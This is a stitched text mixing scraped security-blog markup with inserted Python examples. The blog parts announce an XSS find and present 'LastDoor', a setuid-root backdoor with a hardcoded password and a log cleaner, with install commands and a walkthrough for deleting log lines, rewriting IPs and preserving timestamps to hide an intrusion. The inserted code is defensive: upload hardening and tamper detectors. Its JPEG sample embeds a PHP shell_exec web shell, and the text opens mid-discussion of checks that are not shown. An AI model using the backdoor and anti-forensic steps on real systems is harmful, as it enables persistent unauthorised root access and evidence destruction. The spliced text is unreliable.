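The four checks above fail because each one trusts something the client controls: the declared content type, the text after the last dot, or the mere presence of an image header. As an added example that is not the tutorial's code nor from any project, this is the handler on the defending side: it derives the stored name itself, allows exactly one whitelisted extension, and rebuilds the JPEG without its COM/APPn segments so an Exif comment never reaches disk. SAMPLE_JPEG is a constructed file; storing uploads where no script handler runs is still required and is not shown here.

```python
"""Hardened upload handling for the four bypasses described above.

Added example, not from the tutorial or any project. Assumes JPEG avatar
uploads; SAMPLE_JPEG is a constructed file, not a real photo. Uploads must
still be stored where no script handler runs (not shown).
"""
import re
import secrets
from typing import List, Optional, Tuple

ALLOWED_EXT = {"jpg", "jpeg"}
EOI, SOS, COM = 0xD9, 0xDA, 0xFE


def validate_filename(name: str) -> Optional[str]:
    """Return the canonical extension, or None when the name must be rejected.

    Covers 1 and 2: no null bytes or separators (shell.php%00.jpg,
    shell.php;.jpg), exactly one dot (shell.jpg.php, shell.php.xxxjpg, and
    the .htaccess of 4), and a case-folded whitelist rather than a blacklist
    (shell.jpg.PhP, .phtml, .php5). The client's content type is never consulted.
    """
    lowered = name.lower()
    if any(ch in lowered for ch in "\x00;/\\") or "%00" in lowered:
        return None
    tokens = [t for t in re.split(r"[.\s]+", lowered) if t]
    if len(tokens) != 2 or tokens[1] not in ALLOWED_EXT:
        return None
    return tokens[1]


def strip_jpeg_metadata(data: bytes) -> Tuple[bytes, List[int]]:
    """Rebuild a JPEG without COM and APPn (JFIF, Exif, XMP) segments.

    Covers 3: getimagesize() still succeeds on the result, but the comment
    that carried the shell is gone. Returns (cleaned bytes, dropped markers).
    Everything from the Start-Of-Scan marker onward is copied verbatim.
    """
    if data[:3] != b"\xff\xd8\xff":
        raise ValueError("not a JPEG (missing SOI marker)")
    out = bytearray(b"\xff\xd8")
    dropped: List[int] = []
    pos = 2
    while pos + 4 <= len(data):
        if data[pos] != 0xFF:
            raise ValueError("corrupt marker stream at offset %d" % pos)
        marker = data[pos + 1]
        if marker == 0xFF:            # fill byte between markers
            pos += 1
            continue
        if marker == SOS:             # entropy-coded data follows; keep as is
            out += data[pos:]
            return bytes(out), dropped
        if marker == EOI:
            break
        length = int.from_bytes(data[pos + 2:pos + 4], "big")
        segment = data[pos:pos + 2 + length]
        if len(segment) != 2 + length:
            raise ValueError("truncated segment at offset %d" % pos)
        if marker == COM or 0xE0 <= marker <= 0xEF:
            dropped.append(marker)
        else:
            out += segment
        pos += 2 + length
    out += b"\xff\xd9"
    return bytes(out), dropped


def accept_upload(client_name: str, data: bytes) -> Tuple[str, bytes, List[int]]:
    """Validate and clean; return (stored_name, cleaned_bytes, dropped_markers).

    The stored name is random, so the client-chosen name never reaches the
    filesystem and a trick that slips past validate_filename() has no foothold.
    """
    ext = validate_filename(client_name)
    if ext is None:
        raise ValueError("rejected filename: %r" % client_name)
    cleaned, dropped = strip_jpeg_metadata(data)
    return "%s.%s" % (secrets.token_hex(16), ext), cleaned, dropped


def _segment(marker: int, payload: bytes) -> bytes:
    return b"\xff" + bytes([marker]) + (len(payload) + 2).to_bytes(2, "big") + payload


# Constructed sample: JFIF header, a COM segment carrying the tutorial's tiny
# shell, a quantisation table, a scan header, three bytes of scan data, EOI.
SAMPLE_JPEG = (
    b"\xff\xd8"
    + _segment(0xE0, b"JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00")
    + _segment(COM, b"<?if($_GET['r0ng']){echo\"<pre>\".shell_exec($_GET[\"r0ng\"]);}?>")
    + _segment(0xDB, b"\x00" + bytes(64))
    + _segment(SOS, b"\x01\x01\x00\x00\x3f\x00")
    + b"\x12\x34\x56"
    + b"\xff\xd9"
)
```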
<h4>
(If you find this useful, why not check out an advert below to support the blog? :O )<b> </b><span style="color: #3d85c6;"><b>~r0ng</b></span></h4>
Unknownnoreply@blogger.com10tag:blogger.com,1999:blog-2511450483904536606.post-7725282648683923622013-01-25T11:47:00.001-08:002013-08-18T05:49:13.312-07:002nd Cross-site-scripting vulnerability find in Microsoft.com<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi0WIRK_iQW6dZ9-POsopklU0xIDmNEaSKn4kLH18Pbuz7D7nasuQBtbNRiwpL_p9gkWocM0pM_jprjEmCE0LNfuOXfHtTa408OWrhZvHJo7iVMiY8QytWRptsixglCnpzjmvyvajM_XJk2/s1600/microsoft.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi0WIRK_iQW6dZ9-POsopklU0xIDmNEaSKn4kLH18Pbuz7D7nasuQBtbNRiwpL_p9gkWocM0pM_jprjEmCE0LNfuOXfHtTa408OWrhZvHJo7iVMiY8QytWRptsixglCnpzjmvyvajM_XJk2/s1600/microsoft.png" /></a></div>
<br />
Another Microsoft find for the wall! <a href="http://technet.microsoft.com/en-us/security/cc308589.aspx">http://technet.microsoft.com/en-us/security/cc308589.aspx</a><br />
<br />Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-2511450483904536606.post-61708986841364209262012-12-14T10:00:00.000-08:002014-12-16T10:42:08.723-08:00<h3 class="post-title entry-title" itemprop="name">
<a href="http://hackers2devnull.blogspot.co.uk/2012/12/blog-post_14.html">C Source Release:</a></h3>
<h2>
<span style="font-family: Georgia,"Times New Roman",serif; font-size: x-large;">LastDoor</span> -<span style="font-family: Georgia,"Times New Roman",serif;"> Root Backdoor and Log-Cleaner for Linux</span></h2>
<h2>
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiTU7yrOExBRm2DNjKBeyzRiXpBHBmWDVwUQIlje18PMyS5Pq7ZKPOH7csNtmZItA7fmzepYkxkEF1wcT2RVKbMHl7ILs9oixRTgDf3ngnDdTe8RdEvG_cCOSSArsLDfDJllDxcq-ENAMyy/s1600/functions1x.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiTU7yrOExBRm2DNjKBeyzRiXpBHBmWDVwUQIlje18PMyS5Pq7ZKPOH7csNtmZItA7fmzepYkxkEF1wcT2RVKbMHl7ILs9oixRTgDf3ngnDdTe8RdEvG_cCOSSArsLDfDJllDxcq-ENAMyy/s1600/functions1x.jpg" /></a></h2>
<h4>
[<span style="color: red;">+</span>] What is it?</h4>
<h3>
A backdoor for retaining root access and a log cleaner with several functions.</h3>
<h4>
<a name='more'></a></h4>
<h4>
<span style="color: red;">Important!</span>: LastDoor was created as a demonstration tool for use in legal penetration testing. By using this program you accept full responsibility. The creator accepts no liability for any damage or harm that may be caused with its use.</h4>
<h4>
<br /> [<span style="color: red;">+</span>] Features?</h4>
<span style="font-weight: normal;">- Hardcoded password, no prompt/blank screen unless correct password entered</span><br />
<br />
<span style="font-weight: normal;">
- Protection for virtual file systems</span><br />
<br />
<span style="font-weight: normal;">
- All commands sent to system as root once setuid 0.</span><br />
<br />
<span style="font-weight: normal;">
- Log cleaner searches the file system for chosen strings, no finite log lists used</span><br />
<br />
<span style="font-weight: normal;">
- Log cleaner options:</span><br />
<span style="font-weight: normal;">
- Search string replace with new string (e.g. change your ip in the logs)</span><br />
<br />
<span style="font-weight: normal;">
- Search string delete string</span><br />
<br />
<span style="font-weight: normal;">
- Search string delete line</span><br />
<br />
<span style="font-weight: normal;">
- Search string delete file contents</span><br />
<br />
<span style="font-weight: normal;">
- Multi-string search/destroy at once</span><br />
<br />
<span style="font-weight: normal;">
- Includes hidden files</span><br />
<br />
<span style="font-weight: normal;">
- Maintains the file modified date despite making changes</span><br />
<br />
<span style="font-weight: normal;">
- On running the log cleaner, the process is forked as a background daemon</span><br />
<br />
<span style="font-weight: normal;">
- User sets timer prior to running so they can logout/exit, and it will clean up after you have gone.</span><br />
<br />
<span style="font-weight: normal;">
- If you don't logout prior to the process starting, the file search process will be displayed</span><br />
<br />
<span style="font-weight: normal;">
- If you do logout prior to the process starting this will allow your .bash_history to refresh</span><br />
<span style="font-weight: normal;">
and be included in the search (should you want to delete your ./LastDoor command for example). </span><br />
<h4>
[<span style="color: red;">+</span>] Compatibility issues? </h4>
<span style="font-weight: normal;">- The program utilizes find, grep and sed. The syntax used was tested in a GNU coreutils environment and will fail on BSD (for example). This will be fixed in the next version after further testing is done.</span><br />
<h4>
[<span style="color: red;">+</span>] Compile/use? </h4>
<span style="font-weight: normal;">- gcc LastDoor.c -o LastDoor -Wall (all std libs used)</span><br />
<br />
<span style="font-weight: normal;">
- cp LastDoor /bin/LastDoor (for example)</span><br />
<br />
<span style="font-weight: normal;">
- chmod u+s /bin/LastDoor (set the s bit)</span><br />
<span style="font-weight: normal;"><br />- non-rootuser@whatever# /bin/LastDoor (run!)</span><br />
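Two host-side checks for what the write-up above describes, as an added example that is neither LastDoor's code nor from the original post: an unexpected setuid-root binary (the backdoor installed with chmod u+s) and a log whose mtime has been put back after editing. SETUID_BASELINE and the directories in the main call are placeholder assumptions to adapt to the host.

```python
"""Host checks for the two things LastDoor leaves behind, per the post above.

Added example, not part of LastDoor or the original post. Assumes a Linux
host; SETUID_BASELINE and the directories passed to scan() are placeholders.
  1. a setuid-root binary that is not in the host's known set (the backdoor,
     installed with chmod u+s);
  2. a log file whose mtime was put back after editing (the log cleaner):
     utime() restores mtime but itself bumps ctime, which only the kernel
     sets, so ctime well ahead of mtime on an append-only log is a tell.
"""
import os
import stat
import tempfile
import time
from typing import Dict, Iterable, List

# Placeholder baseline: generate it from a known-good image of the host.
SETUID_BASELINE = {"/usr/bin/sudo", "/usr/bin/passwd", "/usr/bin/su", "/bin/su"}


def fake_stat(mode: int, uid: int, mtime: float = 0, ctime: float = 0) -> os.stat_result:
    """Build a stat result from the fields the checks below look at (for tests)."""
    return os.stat_result((mode, 1, 1, 1, uid, uid, 0, 0, mtime, ctime))


def is_unexpected_setuid(path: str, st: os.stat_result,
                         baseline: Iterable[str] = SETUID_BASELINE) -> bool:
    """True for a root-owned regular file with setuid/setgid not in baseline."""
    mode = st.st_mode
    if not stat.S_ISREG(mode) or not mode & (stat.S_ISUID | stat.S_ISGID):
        return False
    return st.st_uid == 0 and path not in set(baseline)


def mtime_reset(st: os.stat_result, slack: float = 5.0) -> bool:
    """True when ctime is later than mtime by more than slack seconds."""
    return (st.st_ctime - st.st_mtime) > slack


def scan(setuid_roots: Iterable[str], log_roots: Iterable[str],
         slack: float = 5.0) -> Dict[str, List[str]]:
    """Walk the given trees and collect findings; unreadable entries are skipped."""
    findings: Dict[str, List[str]] = {"setuid": [], "mtime_reset": []}

    def walk(root):
        for dirpath, _, files in os.walk(root):
            for f in files:
                p = os.path.join(dirpath, f)
                try:
                    st = os.lstat(p)
                except OSError:
                    continue
                if stat.S_ISLNK(st.st_mode):
                    continue
                yield p, st

    for root in setuid_roots:
        for p, st in walk(root):
            if is_unexpected_setuid(p, st):
                findings["setuid"].append(p)
    for root in log_roots:            # only logs: package files legitimately have old mtimes
        for p, st in walk(root):
            if mtime_reset(st, slack):
                findings["mtime_reset"].append(p)
    return findings


def demo_mtime_reset() -> Dict[str, List[str]]:
    """Reproduce the log-cleaner artefact in a temp dir and scan it."""
    d = tempfile.mkdtemp()
    log = os.path.join(d, "syslog")
    with open(log, "w") as fh:         # constructed log line
        fh.write("Dec 13 23:54:00 host sshd[1]: Accepted password for user\n")
    past = time.time() - 3600
    os.utime(log, (past, past))        # put mtime back an hour; ctime stays "now"
    return scan([], [d])


if __name__ == "__main__":
    print(scan(["/bin", "/usr/bin", "/usr/local/bin"], ["/var/log"]))
```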
<h3>
<b><i>Example scenario: </i></b></h3>
<span style="color: #cc0000; font-family: Arial, Helvetica, sans-serif; font-size: small;">"We have managed to escalate to root via a local exploit on the server and now want to put in place a means of getting back to root in the future whilst covering our tracks.."</span>:<br />
<br />
<span style="color: blue;"><br /></span>
<span style="color: blue;">Step 1</span>: Compile the program and set the user s (setuid) bit permission:<br />
<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiPzmB4V7614bSykQTlgUH3gbxY8wDbGbLQVsDrGtddpsIPM0s3F5DxnnDMUZLWh40hNeW2plMVGZX6MfaN2uW8wUTxYRVyaruewTA2Vr96MAjfySiv5gyy_Ce3BFVsLlvHTKc23eBFAQ0t/s1600/compile2x.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiPzmB4V7614bSykQTlgUH3gbxY8wDbGbLQVsDrGtddpsIPM0s3F5DxnnDMUZLWh40hNeW2plMVGZX6MfaN2uW8wUTxYRVyaruewTA2Vr96MAjfySiv5gyy_Ce3BFVsLlvHTKc23eBFAQ0t/s1600/compile2x.jpg" /></a></div>
<br />
Note that the permissions are now: -rw<u><b>s</b></u>r-xr-x<b> </b>for LastDoor<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiYUowIZG5J6hK1dYjxPSOePpGYdl_zdh4WzkUrVQ4fzEVku-6Ek_ebzPeL1bxRB0VqH50oYwbm5AgNRwBz9xODIpoRJQJTiQlnQOHyLBun3WsHganyQEU03BbFbZmn3smk6tHv46l5TTwf/s1600/compile3x.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiYUowIZG5J6hK1dYjxPSOePpGYdl_zdh4WzkUrVQ4fzEVku-6Ek_ebzPeL1bxRB0VqH50oYwbm5AgNRwBz9xODIpoRJQJTiQlnQOHyLBun3WsHganyQEU03BbFbZmn3smk6tHv46l5TTwf/s1600/compile3x.jpg" /></a></div>
<br />
<span style="color: blue;">Step 2</span>: Run program and login (note that there is no password prompt, and no feedback is given unless password is correct):<br />
<br />
Note, I switched to a non-root user for demonstration purposes:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhiCLNNHR5R6uxx1oLmt3k6lTFMfS27h2ie_ef9sDNW9EVMFmA5xHH1vfrK496wYGbbRp3RWv4MJiIpFey28Q2k9K3MfRATlygarO-YYUeV2OekMjskEssoqjuMlPhja-hcH30V-SVc_UTa/s1600/id1x.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhiCLNNHR5R6uxx1oLmt3k6lTFMfS27h2ie_ef9sDNW9EVMFmA5xHH1vfrK496wYGbbRp3RWv4MJiIpFey28Q2k9K3MfRATlygarO-YYUeV2OekMjskEssoqjuMlPhja-hcH30V-SVc_UTa/s1600/id1x.jpg" /></a></div>
<br />
Run program and enter password (r0ng) <br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjGN3peDadxys28aNoKRmgwEXHexY1trr9ijt6GIpvDa8RchsQt2K0GslGKgGXpEEkGqsTzo2hyhyphenhyphenPLaFC3_tBi75HTULDR5mEy06-q9wh3inunvTStX9HuxG2u8vfGudsREb_m68Rj6gbZ/s1600/passx.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjGN3peDadxys28aNoKRmgwEXHexY1trr9ijt6GIpvDa8RchsQt2K0GslGKgGXpEEkGqsTzo2hyhyphenhyphenPLaFC3_tBi75HTULDR5mEy06-q9wh3inunvTStX9HuxG2u8vfGudsREb_m68Rj6gbZ/s1600/passx.jpg" /></a></div>
<br />
First signs of life!: <br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiTU7yrOExBRm2DNjKBeyzRiXpBHBmWDVwUQIlje18PMyS5Pq7ZKPOH7csNtmZItA7fmzepYkxkEF1wcT2RVKbMHl7ILs9oixRTgDf3ngnDdTe8RdEvG_cCOSSArsLDfDJllDxcq-ENAMyy/s1600/functions1x.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiTU7yrOExBRm2DNjKBeyzRiXpBHBmWDVwUQIlje18PMyS5Pq7ZKPOH7csNtmZItA7fmzepYkxkEF1wcT2RVKbMHl7ILs9oixRTgDf3ngnDdTe8RdEvG_cCOSSArsLDfDJllDxcq-ENAMyy/s1600/functions1x.jpg" /></a></div>
<br />
<span style="color: blue;">Step 3</span>: Verify that we are root: Select option 1 and check 'id' & 'whoami':<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjgVQ_UGDydsLXWWBW7IMCss1Enc5hTjLX81TbHCfrdgSOJ4zSj9XA8h1wnN35ZXfVgeETwDYhOjtivkCwCXD-9P74swdSmAfzq4BvnBQocCoTEUUpBoObkrFKzFYhKDo48N0H6D1k9Ng_Z/s1600/functions2x.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjgVQ_UGDydsLXWWBW7IMCss1Enc5hTjLX81TbHCfrdgSOJ4zSj9XA8h1wnN35ZXfVgeETwDYhOjtivkCwCXD-9P74swdSmAfzq4BvnBQocCoTEUUpBoObkrFKzFYhKDo48N0H6D1k9Ng_Z/s1600/functions2x.jpg" /></a></div>
<br />
<span style="color: blue;">Step 4</span>: Now that the backdoor is in place, time to cover tracks with the log cleaner. Notice in the picture below that I have chosen the syslog for demonstration purposes. Highlighted for future reference is the last modified date, "2012-12-13 23:54".<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgAa4EyWrQzJbWyCoLcFnWaqOxpWrNKB0U26FCv-Z0XpTLuVMljjX1fpoxsAFUTUt9ipu2MB5qyx0WjTzOchyhwe5ottIST9_Az-YYpN8pOeAw78L2uGVPDDDhW4OOadCDEdVs6E9QW_J0U/s1600/varlog1x.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgAa4EyWrQzJbWyCoLcFnWaqOxpWrNKB0U26FCv-Z0XpTLuVMljjX1fpoxsAFUTUt9ipu2MB5qyx0WjTzOchyhwe5ottIST9_Az-YYpN8pOeAw78L2uGVPDDDhW4OOadCDEdVs6E9QW_J0U/s1600/varlog1x.jpg" /></a></div>
<br />
Prior to running the log cleaner, I modified two IPs in the syslog to illustrate its functions. The two highlighted lines contain the IP 987.654.321.987 and, on the next line, 123.456.789.123. We will aim to delete the line where the first IP is found, and change the second IP from 123.456.789.123 to 111.111.111.111.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgnBlKaQFrdOoVLV3DCAUKfQteqcH4M9ComShkIrltf4lJ7V_is4iJ4P-5Iry87kWRjE0oWzOyt-vOOgm2kdD0kyfT7KddoOzKBxark0Hj7Tpe4aNh345uGjft_ApuIMEKiOu9f9KkIpOvH/s1600/varlog2x.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgnBlKaQFrdOoVLV3DCAUKfQteqcH4M9ComShkIrltf4lJ7V_is4iJ4P-5Iry87kWRjE0oWzOyt-vOOgm2kdD0kyfT7KddoOzKBxark0Hj7Tpe4aNh345uGjft_ApuIMEKiOu9f9KkIpOvH/s1600/varlog2x.jpg" /></a></div>
<br />
<span style="color: blue;">Step 5</span>: Bring up the Log Cleaner options:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjFdRm7OorCyTlv8xd4MtEcr2X1KM_EW2r2UvAHuHbPj0Z10a8ZTJdI-YQPyNyN5ga2LZnfCZGn9q1ghub_SakMSzUu3NoGkIHDJWKSB3ZABSNFZrjee39bR2uq42B154LniRak2oaOUKFu/s1600/functions3x.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjFdRm7OorCyTlv8xd4MtEcr2X1KM_EW2r2UvAHuHbPj0Z10a8ZTJdI-YQPyNyN5ga2LZnfCZGn9q1ghub_SakMSzUu3NoGkIHDJWKSB3ZABSNFZrjee39bR2uq42B154LniRak2oaOUKFu/s1600/functions3x.jpg" /></a></div>
<br />
We want to replace the IP 123.456.789.123 with 111.111.111.111, so select option 1 (search/replace string), enter the IP address to search for, enter the replacement IP, then enter the max directory depth (e.g. /var/log/... would require 3):<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiWRKRQElD0NDmLkQB3cE3Ku8bKpINPUqDidhHSrwavYgOik2TVi7r0M72Q5UTUDQJK96l9qDpvBWcMKIz0xXvA5Ltb00Bfg07nVAYLPuVlT_woojv_TD27fQzQLVjWIrvvLwVloNVKFKM0/s1600/functions4x.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiWRKRQElD0NDmLkQB3cE3Ku8bKpINPUqDidhHSrwavYgOik2TVi7r0M72Q5UTUDQJK96l9qDpvBWcMKIz0xXvA5Ltb00Bfg07nVAYLPuVlT_woojv_TD27fQzQLVjWIrvvLwVloNVKFKM0/s1600/functions4x.jpg" /></a></div>
<br />
After that, we are asked if we want to do more search/replace jobs. Since we also want to delete the line where the IP 987.654.321.987 is present, we choose yes.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgeMiHQ1Hiipa_JCUnu7i11M4MMWm1o0AUl3ImxBwV63Md6yHmRVDBrrzdDvGHJQPjg98JYMZ3Oa3csohVlkbeVzhBKP2gJ2oErSrjIYA3bb2hV6cNpioiI77h4cCyWeZeJzpIkAaGKfgIG/s1600/functions5x.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgeMiHQ1Hiipa_JCUnu7i11M4MMWm1o0AUl3ImxBwV63Md6yHmRVDBrrzdDvGHJQPjg98JYMZ3Oa3csohVlkbeVzhBKP2gJ2oErSrjIYA3bb2hV6cNpioiI77h4cCyWeZeJzpIkAaGKfgIG/s1600/functions5x.jpg" /></a></div>
<br />
Following the on-screen prompt, we enter the second IP, the same directory depth of 3, and this time, since we are finished, enter 'no' to more search/replace jobs.<br />
<br />
Notice that there is a final prompt for the number of seconds to wait before executing. I enter 5, which gives adequate time to log out and close the shell (the process then runs as a background daemon). This is only necessary if, for example, you want to make sure your bash history is updated to delete previous commands like "./LastDoor", or you want to make sure your IP isn't recorded on logout.<br />
<br />
For demonstration purposes I don't exit the shell, and so I am able to view the progress of the search from the shell:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj34G8QkY2rswLhbfLz01ROHOmDtqM63hUvKJf_m8bV6K9ikF1cDP0ezuYYlUC5SNSFqIIf5qCWmfMVTd6J50Ug3UFceDn917pnF3AFK9Lbon6Pczy0MrIEz1ATXLWa-QWbRZw_zofMR-eV/s1600/functions6x.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj34G8QkY2rswLhbfLz01ROHOmDtqM63hUvKJf_m8bV6K9ikF1cDP0ezuYYlUC5SNSFqIIf5qCWmfMVTd6J50Ug3UFceDn917pnF3AFK9Lbon6Pczy0MrIEz1ATXLWa-QWbRZw_zofMR-eV/s1600/functions6x.jpg" /></a></div>
<br />
Once the process completes, I cat syslog to check that the changes were made. As the overlay image below shows, the line where the first IP was found was deleted, and the second IP, formerly 123.456.789.123, was changed to 111.111.111.111, as requested.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgIMXUUl03SvgoaJuRhvWvmqGhNRmy1qYFcuFUXzm3uSpxJ6iSat626iy9JmiNfmgSm5biyoL9XJ-NRqeGCkYkxYWLccj28pYIHVm1c5366F7XnqTrUUt7fCyhK6tliLAYCknXCMIPPfz7s/s1600/finishedz.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgIMXUUl03SvgoaJuRhvWvmqGhNRmy1qYFcuFUXzm3uSpxJ6iSat626iy9JmiNfmgSm5biyoL9XJ-NRqeGCkYkxYWLccj28pYIHVm1c5366F7XnqTrUUt7fCyhK6tliLAYCknXCMIPPfz7s/s1600/finishedz.jpg" /></a></div>
<br />
Finally, we want to check that the file's modified date has not been changed, as this might arouse suspicion. Running "ls -l": the image below shows that the log cleaner has maintained the original file modified date, which was "2012-12-13 23:54". Hurrah!<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg_IhmEp-CrtHVefPI_Z623IGv22O7rOWxzEfMEguYFSn18Cbo7_92_dF7zTtADGAYbet07zgmJcS6J_gCzdBAn2WyNBS1P_AyTvHOpw970H4cPd_vJ_JaaKXw_Lw18ULHRd8PDDd5fBVbm/s1600/functions8x.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg_IhmEp-CrtHVefPI_Z623IGv22O7rOWxzEfMEguYFSn18Cbo7_92_dF7zTtADGAYbet07zgmJcS6J_gCzdBAn2WyNBS1P_AyTvHOpw970H4cPd_vJ_JaaKXw_Lw18ULHRd8PDDd5fBVbm/s1600/functions8x.jpg" /></a></div>
<br />
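The two properties this walkthrough relies on, a log whose content was rewritten in place and a modification time restored to its old value, are exactly what a defender can check for. The following is an added example, not code from the post or from the LastDoor archive: it writes a constructed syslog fragment to a temporary file, stamps the post's "2012-12-13 23:54" mtime on it the way a preserve-the-date step would, and then reports two indicators. Linux stat semantics are assumed: utime() can set mtime, but the kernel sets ctime itself on every write or attribute change, so ctime cannot be wound back without raw disk access. The hostname, user name and log lines are constructed, and the seconds in the preserved mtime are assumed to be :00.<br />

```python
"""Detect signs that a syslog-style file was edited in place and then had its
modification time restored. Added example; not code from the original post."""
import os
import re
import tempfile
import time
from datetime import datetime

# Constructed sample log content, modelled on the post's scenario but not taken from it.
# Its newest entry (23:54:31) is later than the mtime we will stamp on the file (23:54:00),
# which is impossible for a log that was only ever appended to.
SAMPLE_SYSLOG = (
    "Dec 13 23:50:01 host CRON[1234]: (root) CMD (run-parts /etc/cron.hourly)\n"
    "Dec 13 23:52:17 host sshd[2345]: Accepted password for alice from 111.111.111.111 port 52211 ssh2\n"
    "Dec 13 23:54:31 host sshd[2345]: pam_unix(sshd:session): session opened for user alice by (uid=0)\n"
)
# The mtime the post shows the cleaner preserving: "2012-12-13 23:54" (seconds assumed :00).
PRESERVED_MTIME = datetime(2012, 12, 13, 23, 54, 0)

MONTHS = {m: i for i, m in enumerate(
    ["Jan", "Feb", "Mar", "Apr", "May", "Jun", "Jul", "Aug", "Sep", "Oct", "Nov", "Dec"], start=1)}
SYSLOG_TS = re.compile(r"^([A-Z][a-z]{2}) +(\d{1,2}) (\d{2}):(\d{2}):(\d{2}) ")


def parse_syslog_ts(line, year):
    """Epoch time of a classic syslog line, or None if it has no timestamp.
    Classic syslog omits the year, so the caller supplies it."""
    m = SYSLOG_TS.match(line)
    if not m:
        return None
    mon, day, hh, mm, ss = m.groups()
    if mon not in MONTHS:
        return None
    dt = datetime(year, MONTHS[mon], int(day), int(hh), int(mm), int(ss))
    return time.mktime(dt.timetuple())  # local time, the clock syslog wrote with


def newest_entry_ts(path, year):
    """Epoch time of the latest timestamped line in the file (None if nothing parses)."""
    newest = None
    with open(path, "r", errors="replace") as fh:
        for line in fh:
            ts = parse_syslog_ts(line, year)
            if ts is not None and (newest is None or ts > newest):
                newest = ts
    return newest


def tamper_indicators(path, skew_tolerance=2.0):
    """Return the names of the indicators that fire for a log file that looks rewritten.

    mtime_behind_ctime: utime()/touch can set mtime, but the kernel stamps ctime on
        every write or attribute change (Linux semantics assumed), so a ctime well
        ahead of mtime means the file was touched after it claims to have been
        last written. Plain appends keep the two within a second of each other.
    mtime_before_newest_entry: an append-only log cannot be "last modified"
        earlier than the newest entry it contains.
    """
    st = os.stat(path)
    found = []
    if st.st_ctime - st.st_mtime > skew_tolerance:
        found.append("mtime_behind_ctime")
    year = datetime.fromtimestamp(st.st_mtime).year  # classic syslog has no year field
    newest = newest_entry_ts(path, year)
    if newest is not None and st.st_mtime < newest:
        found.append("mtime_before_newest_entry")
    return found


def demo():
    """Write the constructed log, stamp the old mtime on it, and run the checks."""
    with tempfile.NamedTemporaryFile("w", suffix=".log", delete=False) as fh:
        fh.write(SAMPLE_SYSLOG)
        path = fh.name
    try:
        old = time.mktime(PRESERVED_MTIME.timetuple())
        os.utime(path, (old, old))  # what a "preserve the date" step does; ctime still moves
        return tamper_indicators(path)
    finally:
        os.unlink(path)


if __name__ == "__main__":
    print(demo())  # → ['mtime_behind_ctime', 'mtime_before_newest_entry']
```

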